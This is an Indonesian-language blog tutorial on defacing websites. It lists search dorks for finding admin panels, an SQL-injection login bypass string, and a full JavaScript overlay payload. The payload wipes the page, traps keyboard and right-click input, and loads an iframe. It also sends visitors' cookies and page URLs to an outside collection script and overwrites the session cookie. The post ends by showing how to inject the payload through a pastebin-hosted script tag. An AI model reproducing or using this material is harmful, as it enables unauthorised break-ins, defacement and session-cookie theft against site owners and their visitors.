Deface dengan JS Overlay

Hello World Saya disini post tentang Deface dengan Bypass Admin JS Overlay
TUTORIAL DEFACE DENGAN BYPASS ADMIN JS OVERLAY
1.Dork
inurl:admin/index.php
inurl:/admin/ ext:php
inurl:/admin_panel/ ext:php 
inurl:/cms/admin/ intext:login 
Inurl:/cpadmin/ ext:php atau intext:login

Untuk Mencari Tools Admin Page nya disini Oke Selanjutnya kita buat di pastebin catatan, untuk Js Overlay 
 

    /*
    <style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
    */
    document.getElementsByTagName('body')[0].innerHTML=""
    document.title="XaiSyndicate Team"
    var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/fB72SDT.jpg";document.getElementsByTagName("head")[0].appendChild(shortc)
    function muter2(){
    scrW=screen.availWidth
    scrH=screen.availHeight
    window.moveTo(0,0)
    window.resizeTo(10,10)
    window.focus()
    for(x=0;x<80;x++){
    window.resizeTo(10,scrH*x/80)
    }
    for(y=0;y<80;y++){
    window.resizeTo(scrW*y/80,scrH)
    }
    window.resizeTo(scrW,scrH)
    }
    document.oncontextmenu=new Function("muter2();return false");
    function keypressed(){alert("You Lose , Zuhahahaha");}
    document.onkeydown=keypressed;
    function kasih_tau(){
    alert('You Lose , Zuhahahaha');
    }
    if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('XaiSyndicate Team');",3000);
    else setTimeout("kasih_tau()",3000);
    if(navigator.userAgent.indexOf('MSIE')!=-1){
    document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://betterlifephysio.com.au/xai.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
    }
    else{
    if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
    //muter2();
    log="";
    if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
    document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
    window.onload=function(){
    document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://betterlifephysio.com.au/xai.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
    document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
    }
    }
    }

kalian buat new paste , lalu paste kan script di atas
warna biru : buat alert
warna merah : link deface kalian / bekas / mirror , untuk menutupi halaman yang kita JS Overlay
nah kalo udah buat silahkan dorking
Untuk Live target disini

Masukkan username dan passwordnya
Username : '=''or'
Password : '=''or'
Lalu kita tambahkan kontent / kategori atau apa yang bisa kita post di web tersebut
nah tadi udah buat pastebin kan ? nah di sini kita gunain :)
kalian klik raw di pastebin kalian.
Jika sudah , sekarang kita tambah java script :) 

ex :

<script type="text/javascript" src="http://pastebin.com/raw/NjMB5kmJ"></script>

warna merah ganti link pastebin raw lu

Dan Website sudah di deface :) 

Resource: http://mrluciferz.blogspot.com

Related Posts:

---